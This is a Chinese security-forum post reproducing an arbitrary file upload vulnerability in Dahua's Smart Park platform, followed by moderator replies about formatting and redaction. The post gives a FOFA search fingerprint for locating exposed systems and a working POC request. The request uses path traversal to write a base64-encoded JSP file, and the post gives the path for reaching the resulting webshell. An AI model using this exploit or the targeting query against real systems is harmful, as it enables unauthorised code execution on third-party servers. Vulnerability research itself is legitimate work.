大华智慧园区 poi 任意文件上传漏洞复现 (截止发文时间,部分网站已修复)

wax   ·   发表于 2023-08-23 20:31:40   ·   漏洞文章

没错,又是我

大华智慧园区 poi 任意文件上传漏洞复现 (截止发文时间,部分网站已修复)

还是老规矩,fofa先上
fofa指纹:body=”/WPMS/asset/lib/gridster/“

主站页面如下

上poc

POC文字版

  1. POST /emap/webservice/gis/soap/poi HTTP/1.1
  2. Host: e.m.p.e:ror
  3. /../../emperor.jsp
  4. PCVAcGFnZSBpbXBvcnQ9ImphdmEudGV4dC4qLGphdmEudXRpbC4qLGphdmEuaW8uKiIlPg
  5. o8JQpTaW1wbGVEYXRlRm9ybWF0IGRmID0gbmV3IFNpbXBsZURhdGVGb3JtYXQoInl5eS1NTS1kZC
  6. BISDptbTpzcyIpOwpvdXQucHJpbnRsbihkZi5mb3JtYXQobmV3IERhdGUoKSkpOwpGaWxlIGZpbGUg
  7. PSBuZXcgRmlsZShhcHBsaWNhdGlvbi5nZXRSZWFsUGF0aChyZXF1ZXN0LmdldFNlcnZsZXRQYXRoKC
  8. kpKTsKZmlsZS5kZWxldGUoKTsKJT4=

传了马以后直接访问

文字路径:/upload/马子.jsp

用户名金币积分时间理由
Track-魔方 400.00 0 2023-09-06 21:09:01 深度100 普适 300

打赏我,让我更有动力~

4 条回复   |  直到 2023-9-6 | 885 次浏览

Track-魔方
发表于 2023-8-24

POC这里能用代码块包裹住吗,并且补全为完整的一个请求数据包,敏感信息脱敏即可

评论列表

  • 加载数据中...

编写评论内容

Track-魔方
发表于 2023-8-24

本月奖金池已空,金币奖励将于下月打赏

评论列表

  • 加载数据中...

编写评论内容

Track-魔方
发表于 2023-9-6

同学需要注意文章可读性问题,漏洞复现POC应当用代码块包裹,并且给出完整的数据包,格式上这次我就稍微帮你改了一下

评论列表

  • 加载数据中...

编写评论内容

Track-魔方
发表于 2023-9-6

打码也需要注意一下,ip地址漏了,这次我帮你码上了

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.